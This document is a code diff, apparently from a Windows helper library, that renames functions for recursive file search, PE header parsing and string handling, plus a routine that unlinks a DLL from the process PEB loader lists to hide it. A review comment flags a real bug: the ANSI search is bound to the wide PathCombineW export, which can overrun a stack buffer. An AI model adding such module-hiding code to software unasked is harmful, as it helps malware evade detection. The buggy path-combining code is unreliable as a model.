WIN32_FIND_DATAA FindData = { 0 };
|
||||
HANDLE FindHandle = INVALID_HANDLE_VALUE;
|
||||
|
@ -31,7 +33,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
|
|||
if (FindData.cFileName[0] == '$')
|
||||
continue;
|
||||
|
||||
RfZeroMemory(szFullPattern, MAX_PATH);
|
||||
ZeroMemoryEx(szFullPattern, MAX_PATH);
|
||||
if (PathCombineA(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -52,7 +54,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainA(LPCSTR Path, LPCSTR Pattern, PVOID p
|
|||
|
||||
do
|
||||
{
|
||||
RfZeroMemory(szFullPattern, MAX_PATH);
|
||||
ZeroMemoryEx(szFullPattern, MAX_PATH);
|
||||
if (!(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
|
||||
{
|
||||
if (PathCombineA(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
|
@ -88,7 +90,7 @@ BOOL RecursiveFindFileA(LPCSTR Path, LPCSTR Pattern)
|
|||
BOOL bIsNewlyLoaded = FALSE;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hShlwapi = RfGetModuleHandleW(L"Shlwapi.dll");
|
||||
hShlwapi = GetModuleHandleExW(L"Shlwapi.dll");
|
||||
if (hShlwapi == NULL)
|
||||
{
|
||||
bIsNewlyLoaded = TRUE;
|
||||
|
@ -97,7 +99,7 @@ BOOL RecursiveFindFileA(LPCSTR Path, LPCSTR Pattern)
|
|||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
PathCombineA = (PATHCOMBINEA)RfGetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
PathCombineA = (PATHCOMBINEA)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
if (PathCombineA == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -121,7 +123,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
|
|||
typedef LPWSTR(WINAPI* PATHCOMBINEW)(LPCWSTR, LPCWSTR, LPCWSTR);
|
||||
PATHCOMBINEW PathCombineW = (PATHCOMBINEW)pfnPathCombineW;
|
||||
|
||||
HANDLE HeapHandle = RfGetProcessHeap();
|
||||
HANDLE HeapHandle = GetProcessHeapEx();
|
||||
WCHAR szFullPattern[MAX_PATH] = { 0 };
|
||||
WIN32_FIND_DATAW FindData = { 0 };
|
||||
HANDLE FindHandle = INVALID_HANDLE_VALUE;
|
||||
|
@ -143,7 +145,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
|
|||
if (FindData.cFileName[0] == '$')
|
||||
continue;
|
||||
|
||||
RfZeroMemory(szFullPattern, MAX_PATH);
|
||||
ZeroMemoryEx(szFullPattern, MAX_PATH);
|
||||
if (PathCombineW(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -164,7 +166,7 @@ BOOL UnusedSubroutineRecursiveFindFileMainW(LPCWSTR Path, LPCWSTR Pattern, PVOID
|
|||
|
||||
do
|
||||
{
|
||||
RfZeroMemory(szFullPattern, MAX_PATH);
|
||||
ZeroMemoryEx(szFullPattern, MAX_PATH);
|
||||
if (!(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY))
|
||||
{
|
||||
if (PathCombineW(szFullPattern, Path, FindData.cFileName) == NULL)
|
||||
|
@ -200,7 +202,7 @@ BOOL RecursiveFindFileW(LPCWSTR Path, LPCWSTR Pattern)
|
|||
BOOL bIsNewlyLoaded = FALSE;
|
||||
BOOL bFlag = FALSE;
|
||||
|
||||
hShlwapi = RfGetModuleHandleW(L"Shlwapi.dll");
|
||||
hShlwapi = GetModuleHandleExW(L"Shlwapi.dll");
|
||||
if (hShlwapi == NULL)
|
||||
{
|
||||
bIsNewlyLoaded = TRUE;
|
||||
|
@ -209,7 +211,7 @@ BOOL RecursiveFindFileW(LPCWSTR Path, LPCWSTR Pattern)
|
|||
goto EXIT_ROUTINE;
|
||||
}
|
||||
|
||||
PathCombineW = (PATHCOMBINEW)RfGetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
PathCombineW = (PATHCOMBINEW)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");
|
||||
if (PathCombineW == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -221,4 +223,4 @@ EXIT_ROUTINE:
|
|||
FreeLibrary(hShlwapi);
|
||||
|
||||
return bFlag;
|
||||
}
|
||||
}
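Review bot: In RecursiveFindFileA the narrow-string path is still bound to the wide export: the `@ -97,7 +99,7 @@` hunk's new line `PathCombineA = (PATHCOMBINEA)GetProcAddressA((DWORD64)hShlwapi, "PathCombineW");` resolves PathCombineW, and UnusedSubroutineRecursiveFindFileMainA then calls it with `CHAR szFullPattern[MAX_PATH]`, a `LPCSTR Path` and the ANSI `FindData.cFileName`. PathCombineW interprets those buffers as UTF-16, so the inputs are misread and the combined path can be written as wide characters into a MAX_PATH-byte stack array, overrunning it. The export name should be `"PathCombineA"`, and the typedef `typedef LPSTR(WINAPI* PATHCOMBINEA)(LPSTR, LPCSTR, LPCSTR);` so the return type matches the narrow variant; the W counterpart in RecursiveFindFileW is consistent and needs no change. The `PATHCOMBINEA PathCombineA = (PATHCOMBINEA)pfnPathCombineW;` initialiser near the top of the file shares the same mismatch, though its parameter declaration is outside the hunk.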
|
|
@ -1,4 +1,6 @@
|
|||
void RfRemoveEntryList(LIST_ENTRY* Entry)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
VOID RemoveEntryList(LIST_ENTRY* Entry)
|
||||
{
|
||||
if (Entry != NULL) {
|
||||
PLIST_ENTRY OldFlink;
|
||||
|
@ -12,7 +14,7 @@ void RfRemoveEntryList(LIST_ENTRY* Entry)
|
|||
}
|
||||
}
|
||||
|
||||
BOOL RfRemoveDllFromPebW(LPCWSTR lpModuleName) {
|
||||
BOOL RemoveDllFromPebW(LPCWSTR lpModuleName) {
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
||||
|
@ -31,19 +33,17 @@ BOOL RfRemoveDllFromPebW(LPCWSTR lpModuleName) {
|
|||
RemoveEntryList(&Module->InInitializationOrderModuleList);
|
||||
RemoveEntryList(&Module->InMemoryOrderModuleList);
|
||||
RemoveEntryList(&Module->HashTableEntry);
|
||||
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
Next = Next->Flink;
|
||||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
|
||||
BOOL RfRemoveDllFromPebA(LPCSTR lpModuleName) {
|
||||
BOOL RemoveDllFromPebA(LPCSTR lpModuleName) {
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
CHAR wDllName[64] = { 0 };
|
||||
|
@ -56,11 +56,10 @@ BOOL RfRemoveDllFromPebA(LPCSTR lpModuleName) {
|
|||
Module = (PLDR_MODULE)((PBYTE)Next - 16);
|
||||
if (Module->BaseDllName.Buffer != NULL)
|
||||
{
|
||||
RfZeroMemory(wDllName, sizeof(wDllName));
|
||||
ZeroMemoryEx(wDllName, sizeof(wDllName));
|
||||
WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
|
||||
if (StringCompareA(lpModuleName, Module->BaseDllName.Buffer) == 0)
|
||||
if (StringCompareA(lpModuleName, wDllName) == 0)
|
||||
{
|
||||
|
||||
RemoveEntryList(&Module->InLoadOrderModuleList);
|
||||
RemoveEntryList(&Module->InInitializationOrderModuleList);
|
||||
RemoveEntryList(&Module->InMemoryOrderModuleList);
|
||||
|
@ -68,11 +67,9 @@ BOOL RfRemoveDllFromPebA(LPCSTR lpModuleName) {
|
|||
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
Next = Next->Flink;
|
||||
}
|
||||
|
||||
return FALSE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
VOID RtlInitEmptyUnicodeString(PUNICODE_STRING UnicodeString, PWCHAR Buffer, USHORT BufferSize)
|
||||
{
|
||||
UnicodeString->Length = 0;
|
||||
|
@ -5,4 +7,4 @@ VOID RtlInitEmptyUnicodeString(PUNICODE_STRING UnicodeString, PWCHAR Buffer, USH
|
|||
UnicodeString->Buffer = Buffer;
|
||||
|
||||
return;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
VOID RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString)
|
||||
{
|
||||
SIZE_T DestSize;
|
||||
|
@ -15,4 +17,4 @@ VOID RtlInitUnicodeString(PUNICODE_STRING DestinationString, PCWSTR SourceString
|
|||
}
|
||||
|
||||
DestinationString->Buffer = (PWCHAR)SourceString;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
BOOL RtlLoadPeHeaders(PIMAGE_DOS_HEADER* Dos, PIMAGE_NT_HEADERS* Nt, PIMAGE_FILE_HEADER* File, PIMAGE_OPTIONAL_HEADER* Optional, PBYTE* ImageBase)
|
||||
{
|
||||
*Dos = (PIMAGE_DOS_HEADER)*ImageBase;
|
||||
|
@ -12,4 +14,4 @@ BOOL RtlLoadPeHeaders(PIMAGE_DOS_HEADER* Dos, PIMAGE_NT_HEADERS* Nt, PIMAGE_FILE
|
|||
*Optional = (PIMAGE_OPTIONAL_HEADER)((PBYTE)*File + sizeof(IMAGE_FILE_HEADER));
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "StringManipulation.h"
|
||||
|
||||
PCHAR SecureStringCopyA(PCHAR String1, LPCSTR String2, SIZE_T Size)
|
||||
{
|
||||
PCHAR pChar = String1;
|
||||
|
@ -14,4 +16,4 @@ PWCHAR SecureStringCopyW(PWCHAR String1, LPCWSTR String2, SIZE_T Size)
|
|||
while (Size-- && (*String1++ = *String2++) != '\0');
|
||||
|
||||
return pChar;
|
||||
}
|
||||
}
|